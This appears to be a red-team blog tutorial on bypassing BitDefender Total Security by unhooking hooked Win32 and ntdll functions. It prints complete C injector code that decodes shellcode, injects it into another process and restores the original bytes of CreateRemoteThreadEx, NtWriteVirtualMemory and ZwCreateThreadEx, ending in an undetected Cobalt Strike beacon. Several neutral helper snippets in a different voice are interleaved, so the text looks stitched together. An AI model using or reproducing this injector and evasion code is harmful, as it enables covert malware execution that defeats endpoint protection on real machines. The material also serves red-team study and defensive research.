Bypassing endpoint protections such as AVs/EDRs is a phase you need to plan for when preparing a red team operation, and it can take some time to understand how these solutions work before you try to bypass them.
With the large number of resources published online on this topic, it has become easier to understand how these products work and how they can be bypassed.
In this article, I will show you how I managed to bypass BitDefender Total Security using Windows API unhooking. We will first talk about the concept of API unhooking, and then about how we can bypass the protection using this technique.
Our main objective is to perform process injection and get an active Cobalt Strike beacon while BitDefender Total Security is enabled on the endpoint.
API hooking is a method used to intercept and inspect Win32 API calls. AVs/EDRs use this technique to monitor Win32 API calls and determine whether they are legitimate.
Basically, they change the execution flow of a normal API call by placing a JMP instruction at the start of the function. The JMP leads to a custom module controlled by the solution itself, which scans the API call and its arguments and checks whether they are legitimate.
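To make the idea concrete, here is a minimal sketch in C that inspects the first bytes of a function and, if they form a 5-byte relative JMP, computes where the jump leads. It assumes the hook uses the common `E9 rel32` encoding (a product may use other jump forms), and the names `starts_with_rel32_jmp` and `rel32_jmp_target` are hypothetical helpers, not part of any Windows API. It works on a plain byte buffer, so it can be tried on bytes copied out of a debugger.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns 1 if the buffer starts with a near relative JMP (opcode 0xE9
   followed by a 32-bit displacement), 0 otherwise.
   Assumption: the hook uses this encoding; other jump forms are not detected. */
int starts_with_rel32_jmp(const uint8_t *code, size_t len) {
    return len >= 5 && code[0] == 0xE9;
}

/* Computes the destination of a 5-byte "E9 rel32" jump located at `address`.
   The displacement is little-endian, signed, and relative to the address of
   the next instruction (address + 5). The caller must pass at least 5 bytes. */
uint64_t rel32_jmp_target(const uint8_t *code, uint64_t address) {
    uint32_t raw = (uint32_t)code[1]
                 | ((uint32_t)code[2] << 8)
                 | ((uint32_t)code[3] << 16)
                 | ((uint32_t)code[4] << 24);
    int32_t rel = (int32_t)raw;
    return address + 5 + (uint64_t)(int64_t)rel;
}
```

For example, the bytes `E9 10 00 00 00` located at address 0x1000 decode to a jump to 0x1015, while an untouched prologue such as `4C 8B DC 53 56` is not reported as a jump.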
This article by spotless explains how API hooking works; you can check it for more details.
In a previous article, I talked about how we can encode the shellcode and decode it in memory to avoid detection. Let’s try this technique and check whether it works against BitDefender Total Security.
I used the following code after generating the encoded shellcode as we did in the previous article:
#include <windows.h> // This code was written for researching purpose, you have to edit it before using it in real-world // This code will deocde your shellcode and write it directly to the memory int main(int argc, char* argv[]) { // Our Shellcode unsigned char shellcode[] = "MyEncodedshellcode"; // Check arguments counter if(argc != 2){ printf("[+] Usage : decoder.exe [PID]\n"); exit(0); } // The process id we want to inject our code to passed to the executable // Use GetCurrentProcessId() to inject the shellcode into original process int process_id = atoi(argv[1]); // Define the base_address variable which will save the allocated memory address LPVOID base_address; // Retrive the process handle using OpenProcess HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id); if (process) { printf("[+] Handle retrieved successfully!\n"); printf("[+] Handle value is %p\n", process); base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (base_address) { printf("[+] Allocated based address is 0x%x\n", base_address); // Data chars counter int i; // Base address counter int n = 0; for(i = 0; i<=sizeof(shellcode); i++){ // Decode shellcode opcode (you can edit it based on your encoder settings) char DecodedOpCode = shellcode[i] ^ 0x01; // Write the decoded bytes in memory address if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){ // Write the memory address where the data was written printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n); // Increase memory address by 1 n++; } } // Run our code as RemoteThread CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, NULL, 0x50002); } else { printf("[+] Unable to allocate memory ..\n"); } } else { printf("[-] Enable to retrieve process handle\n"); } }
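The decoding step inside the loop above can be looked at in isolation. The sketch below is a hypothetical helper (the name `xor_buffer` is made up for illustration) that applies the same single-byte XOR with a key such as 0x01 to a whole buffer. Because XOR is its own inverse, the same routine both encodes and decodes. It iterates with `i < len`, so it never reads past the end of the buffer.

```c
#include <stddef.h>
#include <stdint.h>

/* XOR every byte of `buf` with `key`, in place.
   Applying the function twice with the same key restores the original data. */
void xor_buffer(uint8_t *buf, size_t len, uint8_t key) {
    for (size_t i = 0; i < len; i++) {
        buf[i] ^= key;
    }
}
```

Running it once over the bytes `41 42 00 FF` with key 0x01 gives `40 43 01 FE`, and running it again returns the original bytes.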
After I compiled the file and executed it to inject the shellcode into explorer.exe, I got the following:
As we can see, BitDefender detected the execution and blocked the action, and my file “injector.exe” was deleted too.
So, what is actually happening, and why did the action get blocked?
I started debugging my executable after recompiling it to see whether any external DLLs were injected into it, and got the following:
A file called “atcuf64.dll” was loaded into my executable, and it belongs to BitDefender!
So, I started to debug the main Win32 APIs that I called during the shellcode injection. Of course, I started with the most suspicious one, “CreateRemoteThread”, and got the following after disassembling it:
Nothing suspicious here, but we can see from the execution flow that we will hit the CreateRemoteThreadEx API, so I disassembled it and got the following:
That looks unusual! We have a JMP instruction at the beginning of the API, and if we take the JMP and continue with the execution flow, we get the following:
As we can see, after taking the JMP and continuing with the execution flow, we land in atcuf64.dll, which means there is a hook on this function that redirects the execution flow to BitDefender’s module to inspect the call.
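One way to reason about what the debugger shows here: a jump at the very start of an exported function whose destination lies outside the module that owns the function deserves a closer look. The sketch below assumes you already know a module's load address and image size (for instance from the debugger's memory map). The names `module_range` and `address_in_module` are hypothetical, and any addresses you feed it are your own observations, not values from this article.

```c
#include <stdint.h>

/* Address range occupied by a loaded module.
   Both values are assumed to come from the debugger's memory map. */
typedef struct {
    uint64_t base;  /* load address of the module */
    uint64_t size;  /* size of the mapped image in bytes */
} module_range;

/* Returns 1 if `addr` falls inside the module's mapped image, 0 otherwise. */
int address_in_module(uint64_t addr, module_range m) {
    return addr >= m.base && (addr - m.base) < m.size;
}
```

A destination outside the owning module is only a hint, not proof of a hook: some exports are thin stubs that legitimately jump into another system DLL, so the destination module still has to be identified by hand.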
So, when a call to CreateRemoteThread reaches CreateRemoteThreadEx, it is redirected to BitDefender’s module. To keep the call from being inspected, we need to return the CreateRemoteThreadEx function to its original state, and that is the unhooking concept.
Because of the hook, our CreateRemoteThread call does not continue with the intended execution flow, which means it does not reach the “ZwCreateThreadEx” API, the underlying API that CreateRemoteThreadEx depends on.
We will talk about this later on, but keep it in mind.
Again, API unhooking is a technique used to return an API to its original state after it has been manipulated by the AV/EDR; by “manipulated” we mean the JMP that has been added to the API to hook it and change the original execution flow.
How can we return it to its original state? We can do the following:
To get the original bytes of CreateRemoteThreadEx, we can open a new instance of our debugger (“x64dbg” in our case) and load kernelbase.dll, because the CreateRemoteThreadEx function lives there.
Then we can type “disasm CreateRemoteThreadEx” in the command window to get the following:
Another way to get the original bytes from “x64dbg” is to go to the Symbols tab after loading kernelbase.dll in the debugger, search for the CreateRemoteThreadEx function in the search bar, and double-click it to get the following:
As we can see, we were able to get the original bytes by disassembling the API. They show that 5 bytes, “4C 8B DC 53 56”, were replaced with the JMP instruction, so in order to unhook the function and restore it to its original state, we need to rewrite those bytes in the copy of kernelbase.dll loaded into our binary.
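The comparison done by eye in the two debugger windows can also be expressed as a small routine. This is a minimal sketch, assuming you have copied the first bytes of the function from the clean DLL and from the hooked process into two arrays. The name `patched_prefix_length` is hypothetical, and apart from the five bytes quoted above, any bytes you pass in are your own observations.

```c
#include <stddef.h>
#include <stdint.h>

/* Compares the first `len` bytes of a clean copy of a function with the
   copy loaded in the process. Returns how many leading bytes must be
   restored, that is, the offset just past the last differing byte,
   or 0 if the two copies are identical. */
size_t patched_prefix_length(const uint8_t *clean, const uint8_t *loaded,
                             size_t len) {
    size_t last = 0;
    for (size_t i = 0; i < len; i++) {
        if (clean[i] != loaded[i]) {
            last = i + 1;
        }
    }
    return last;
}
```

If the clean copy starts with `4C 8B DC 53 56` and the loaded copy starts with a 5-byte JMP followed by identical bytes, the function returns 5, matching the number of bytes that were overwritten.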
We can use the following code to do that:
// Patch 1 to unhook CreateRemoteThreadEx (kernelbase.dll)
HANDLE kernalbase_handle = GetModuleHandle("kernelbase");
LPVOID CRT_address = GetProcAddress(kernalbase_handle, "CreateRemoteThreadEx");
printf("[+] CreateRemoteThreadEx address is : %p\n", CRT_address);
if (WriteProcessMemory(GetCurrentProcess(), CRT_address, "\x4C\x8B\xDC\x53\x56", 5 , NULL)){
    printf("[+] CreateRemoteThreadEx unhooking done!\n");
}
This code uses the GetModuleHandle function to retrieve a handle to the kernelbase.dll module, then uses GetProcAddress to get the address of the CreateRemoteThreadEx function.
After that, we print the address of CreateRemoteThreadEx, and finally we use WriteProcessMemory to write the original bytes “\x4C\x8B\xDC\x53\x56” to the beginning of the function to restore it to its original state.
And of course, we passed GetCurrentProcess() to WriteProcessMemory as the handle for our own process.
So, our code will be:
#include <windows.h> // This code was written for researching purpose, you have to edit it before using it in real-world // This code will deocde your shellcode and write it directly to the memory using WIN32APIs // This code will unhook a couple of WIN32 APIs that was hooked by Bit defender total security int main(int argc, char* argv[]) { // Our Shellcode unsigned char shellcode[] = ""; // Check arguments counter if(argc != 2){ printf("[+] Usage : injector.exe [PID]\n"); exit(0); } // The process id we want to inject our code to passed to the executable // Use GetCurrentProcessId() to inject the shellcode into original process int process_id = atoi(argv[1]); // Patch 1 to unhook CreateRemoteThreadEx (kernelbase.dll) HANDLE kernalbase_handle = GetModuleHandle("kernelbase"); LPVOID CRT_address = GetProcAddress(kernalbase_handle, "CreateRemoteThreadEx"); printf("[+] CreateRemoteThreadEx address is : %p\n", CRT_address); if (WriteProcessMemory(GetCurrentProcess(), CRT_address, "\x4C\x8B\xDC\x53\x56", 5 , NULL)){ printf("[+] CreateRemoteThreadEx unhooking done!\n"); } // Define the base_address variable which will save the allocated memory address LPVOID base_address; // Retrive the process handle using OpenProcess HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id); if (process) { printf("[+] Handle retrieved successfully!\n"); printf("[+] Handle value is %p\n", process); base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (base_address) { printf("[+] Allocated based address is 0x%x\n", base_address); // Data chars counter int i; // Base address counter int n = 0; for(i = 0; i<=sizeof(shellcode); i++){ // Decode shellcode opcode (you can edit it based on your encoder settings) char DecodedOpCode = shellcode[i] ^ 0x01; // Write the decoded bytes in memory address if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){ // Write the memory address where the data was written 
printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n); // Increase memory address by 1 n++; } } // Run our code as RemoteThread CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, 0, 0x1337); } else { printf("[+] Unable to allocate memory ..\n"); } } else { printf("[-] Enable to retrieve process h2andle\n"); } }
After recompiling it, I attached it to the debugger again and put a breakpoint on the OpenProcess function to make sure that the patching (unhooking) part had run, like the following:
As we can see, the patching completed without any problems, and we printed the CreateRemoteThreadEx function address, which is the same as before.
So, let’s disassemble that address, which is the CreateRemoteThreadEx address, to get the following:
Excellent! We can see that we restored the original bytes of our API (unhooked it), and the execution flow will return to normal.
Now if we run the software we should be fine, right?
Unfortunately, no! When I executed the program, it got detected again, but this time before it even reached the CreateRemoteThread function, which means that another API got caught after we edited the code.
After some digging in the code and reviewing the modifications I made, I noticed that we used the “WriteProcessMemory” call both to write each byte of our shellcode and to patch the memory, which makes it suspicious to BitDefender.
So I checked whether WriteProcessMemory is hooked by disassembling it, and got the following:
Nothing suspicious with it. Let’s follow the execution flow and see what it actually does after taking this normal JMP to kernelbase:
As we can see, we reach a point where a call to “NtWriteVirtualMemory” occurs, which is, of course, the underlying function used by “WriteProcessMemory”. Let’s follow the call to see what it looks like:
The “NtWriteVirtualMemory” function is hooked! For some reason, once we used it both to patch the memory and to write the shellcode, it got detected. Please note that when I ran the executable for the first time, it reached CreateRemoteThread successfully!
This means that the call became suspicious once we added the patching code.
So to bypass that, we need to patch “NtWriteVirtualMemory”. Let’s get its original bytes as we did with the “CreateRemoteThreadEx” function.
To do that, we will open ntdll.dll in our debugger and disassemble “NtWriteVirtualMemory” to get the following bytes:
As we can see, we got the original bytes of “NtWriteVirtualMemory”, which were replaced with a JMP to the BitDefender module.
The JMP replaced the bytes “4C 8B D1 B8 3A”, so to unhook the function, we need to replace the JMP with these 5 bytes. To do that, we will reuse the previous code like the following:
// Patch 2 to unhook NtWriteVirtualMemory (ntdll.dll)
// Unhooked it because it gets detected while calling it multiple times
HANDLE ntdll_handle = GetModuleHandle("ntdll");
LPVOID NtWriteVirtualMemory_Address = GetProcAddress(ntdll_handle, "NtWriteVirtualMemory");
printf("[+] NtWriteVirtualMemory address is : %p\n", NtWriteVirtualMemory_Address);
if (WriteProcessMemory(GetCurrentProcess(), NtWriteVirtualMemory_Address, "\x4C\x8B\xD1\xB8\x3A", 5 , NULL)){
    printf("[+] NtWriteVirtualMemory unkooking done!\n");
}
We reused GetModuleHandle to get a handle to the “ntdll” library and GetProcAddress to get the address of “NtWriteVirtualMemory”.
Finally, we wrote the original bytes to the beginning of “NtWriteVirtualMemory”, which replaces the JMP with these 5 bytes.
So the injector code will be:
#include <windows.h> // This code was written for researching purpose, you have to edit it before using it in real-world // This code will deocde your shellcode and write it directly to the memory using WIN32APIs // This code will unhook a couple of WIN32 APIs that was hooked by Bit defender total security int main(int argc, char* argv[]) { // Our Shellcode unsigned char shellcode[] = ""; // Check arguments counter if(argc != 2){ printf("[+] Usage : injector.exe [PID]\n"); exit(0); } // The process id we want to inject our code to passed to the executable // Use GetCurrentProcessId() to inject the shellcode into original process int process_id = atoi(argv[1]); // Patch 1 to unhook CreateRemoteThreadEx (kernelbase.dll) HANDLE kernalbase_handle = GetModuleHandle("kernelbase"); LPVOID CRT_address = GetProcAddress(kernalbase_handle, "CreateRemoteThreadEx"); printf("[+] CreateRemoteThreadEx address is : %p\n", CRT_address); if (WriteProcessMemory(GetCurrentProcess(), CRT_address, "\x4C\x8B\xDC\x53\x56", 5 , NULL)){ printf("[+] CreateRemoteThreadEx unhooking done!\n"); } // Patch 2 to unhook NtWriteVirtualMemory (ntdll.dll) // Unhooked it because it gets detected while calling it multiple times HANDLE ntdll_handle = GetModuleHandle("ntdll"); LPVOID NtWriteVirtualMemory_Address = GetProcAddress(ntdll_handle, "NtWriteVirtualMemory"); printf("[+] NtWriteVirtualMemory address is : %p\n", NtWriteVirtualMemory_Address); if (WriteProcessMemory(GetCurrentProcess(), NtWriteVirtualMemory_Address, "\x4C\x8B\xD1\xB8\x3A", 5 , NULL)){ printf("[+] NtWriteVirtualMemory unkooking done!\n"); } // Define the base_address variable which will save the allocated memory address LPVOID base_address; // Retrive the process handle using OpenProcess HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id); if (process) { printf("[+] Handle retrieved successfully!\n"); printf("[+] Handle value is %p\n", process); base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | 
MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (base_address) { printf("[+] Allocated based address is 0x%x\n", base_address); // Data chars counter int i; // Base address counter int n = 0; for(i = 0; i<=sizeof(shellcode); i++){ // Decode shellcode opcode (you can edit it based on your encoder settings) char DecodedOpCode = shellcode[i] ^ 0x01; // Write the decoded bytes in memory address if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){ // Write the memory address where the data was written printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n); // Increase memory address by 1 n++; } } // Run our code as RemoteThread CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, 0, 0x1337); } else { printf("[+] Unable to allocate memory ..\n"); } } else { printf("[-] Enable to retrieve process h2andle\n"); } }
Let’s compile it and attach it to our debugger, and this time put a breakpoint on CreateRemoteThread to see whether we reach it. We will also check the console to see whether the two functions were patched.
If we reach CreateRemoteThread, that means we patched the “NtWriteVirtualMemory” function and were able to bypass the restriction on it.
So, after doing that, I got the following results:
Excellent! We can see that we reached CreateRemoteThread after unhooking the two functions, which means we are ready to continue the execution.
But stop here and remember what I said about “ZwCreateThreadEx”, the underlying function of CreateRemoteThreadEx. Let us continue the execution flow until we reach it to check whether it’s hooked or not.
As we can see, the ZwCreateThreadEx function is hooked too! This means that if we continue the execution flow, it will be redirected again to BitDefender’s module, which is something we need to avoid.
So for the last time, let’s unhook this function by getting its original bytes and then writing them over the hooked instructions.
I will open “ntdll.dll” and read the original instructions of “ZwCreateThreadEx” like the following:
And when we click on the function, we will get the following:
We got the original bytes of ZwCreateThreadEx, which are “4C 8B D1 B8 C1”, so again, to unhook the function we just need to write these bytes back to the function in the copy of ntdll loaded into our executable.
Please note that for the ntdll functions, the overwritten bytes belong to the syscall stub itself, which means the JMP prevents the API from reaching the system call without first being intercepted.
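To see why these bytes relate to the syscall, it helps to decode them: on x64, `4C 8B D1` is `mov r10, rcx` and `B8` followed by a 32-bit immediate is `mov eax, imm32`, which loads the system call number. The sketch below is a hypothetical helper (`syscall_number_from_stub` is not a Windows API) that reads that number from a clean stub. It assumes the stub starts with exactly this byte pattern, and it needs all four bytes of the immediate, so the three bytes after `C1` (not shown in the dump above) are assumed to be zero in the example.

```c
#include <stddef.h>
#include <stdint.h>

/* Parses the start of an x64 ntdll syscall stub of the assumed form:
     4C 8B D1        mov r10, rcx
     B8 imm32        mov eax, <syscall number>
   Returns the syscall number, or -1 if the bytes do not match this
   pattern (for example because a JMP hook overwrote them). */
int64_t syscall_number_from_stub(const uint8_t *stub, size_t len) {
    if (len < 8) {
        return -1;
    }
    if (stub[0] != 0x4C || stub[1] != 0x8B || stub[2] != 0xD1 ||
        stub[3] != 0xB8) {
        return -1;
    }
    /* The immediate is stored little-endian. */
    uint32_t number = (uint32_t)stub[4]
                    | ((uint32_t)stub[5] << 8)
                    | ((uint32_t)stub[6] << 16)
                    | ((uint32_t)stub[7] << 24);
    return (int64_t)number;
}
```

Fed the bytes `4C 8B D1 B8 C1 00 00 00`, the helper returns 0xC1, while a stub that begins with a JMP returns -1. System call numbers differ between Windows builds, so a value read on one machine should not be assumed to hold on another.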
We will use this code, which adds the final patch to unhook the ZwCreateThreadEx function:
#include <windows.h> // This code was written for researching purpose, you have to edit it before using it in real-world // This code will deocde your shellcode and write it directly to the memory using WIN32APIs // This code will unhook a couple of WIN32 APIs that was hooked by Bit defender total security int main(int argc, char* argv[]) { // Our Shellcode unsigned char shellcode[] = ""; // Check arguments counter if(argc != 2){ printf("[+] Usage : injector.exe [PID]\n"); exit(0); } // The process id we want to inject our code to passed to the executable // Use GetCurrentProcessId() to inject the shellcode into original process int process_id = atoi(argv[1]); // Patch 1 to unhook CreateRemoteThreadEx (kernelbase.dll) HANDLE kernalbase_handle = GetModuleHandle("kernelbase"); LPVOID CRT_address = GetProcAddress(kernalbase_handle, "CreateRemoteThreadEx"); printf("[+] CreateRemoteThreadEx address is : %p\n", CRT_address); if (WriteProcessMemory(GetCurrentProcess(), CRT_address, "\x4C\x8B\xDC\x53\x56", 5 , NULL)){ printf("[+] CreateRemoteThreadEx unhooking done!\n"); } // Patch 2 to unhook NtWriteVirtualMemory (ntdll.dll) // Unhooked it because it gets detected while calling it multiple times HANDLE ntdll_handle = GetModuleHandle("ntdll"); LPVOID NtWriteVirtualMemory_Address = GetProcAddress(ntdll_handle, "NtWriteVirtualMemory"); printf("[+] NtWriteVirtualMemory address is : %p\n", NtWriteVirtualMemory_Address); if (WriteProcessMemory(GetCurrentProcess(), NtWriteVirtualMemory_Address, "\x4C\x8B\xD1\xB8\x3A", 5 , NULL)){ printf("[+] NtWriteVirtualMemory unkooking done!\n"); } // Patch 3 to unhook ZwCreateThreadEx (ntdll.dll) LPVOID ZWCreateThreadEx_address = GetProcAddress(ntdll_handle, "ZwCreateThreadEx"); printf("[+] ZwCreateThreadEx address is : %p\n", ZWCreateThreadEx_address); if (WriteProcessMemory(GetCurrentProcess(), ZWCreateThreadEx_address, "\x4C\x8B\xD1\xB8\xC1", 5 , NULL)){ printf("[+] ZwCreateThreadEx unhooking done!\n"); } // Define the base_address 
variable which will save the allocated memory address LPVOID base_address; // Retrive the process handle using OpenProcess HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, 0, process_id); if (process) { printf("[+] Handle retrieved successfully!\n"); printf("[+] Handle value is %p\n", process); base_address = VirtualAllocEx(process, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (base_address) { printf("[+] Allocated based address is 0x%x\n", base_address); // Data chars counter int i; // Base address counter int n = 0; for(i = 0; i<=sizeof(shellcode); i++){ // Decode shellcode opcode (you can edit it based on your encoder settings) char DecodedOpCode = shellcode[i] ^ 0x01; // Write the decoded bytes in memory address if(WriteProcessMemory(process, base_address+n, &DecodedOpCode, 1, NULL)){ // Write the memory address where the data was written printf("[+] Byte 0x%X wrote sucessfully! at 0x%X\n", DecodedOpCode, base_address + n); // Increase memory address by 1 n++; } } // Run our code as RemoteThread CreateRemoteThread(process, NULL, 100,(LPTHREAD_START_ROUTINE)base_address, NULL, 0, 0x1337); } else { printf("[+] Unable to allocate memory ..\n"); } } else { printf("[-] Enable to retrieve process h2andle\n"); } }
As we can see, we reused the code from patch 2 and just changed the bytes and the function name.
So, let us compile the code again and put a breakpoint on “CreateRemoteThread” so we can stop there and read the console, and then disassemble ZwCreateThreadEx to check whether it was unhooked, like the following:
As we can see, all functions have been unhooked successfully and we reached “CreateRemoteThread”, so let’s disassemble ZwCreateThreadEx to check it, and we get the following:
As we can see, the function was unhooked successfully, and we should be able to execute the injector without any problems.
I will close the debugger now and execute it like the following:
As we can see, it executed without problems, and no alerts popped up!
And this is what we got in Cobalt Strike after executing it:
We got an active Cobalt Strike beacon from the target without getting detected!
And this video shows a quick demo:
I want to thank spotless for his great articles about API hooking and his articles in general.
I used almost the same methodology he used in his article to achieve this.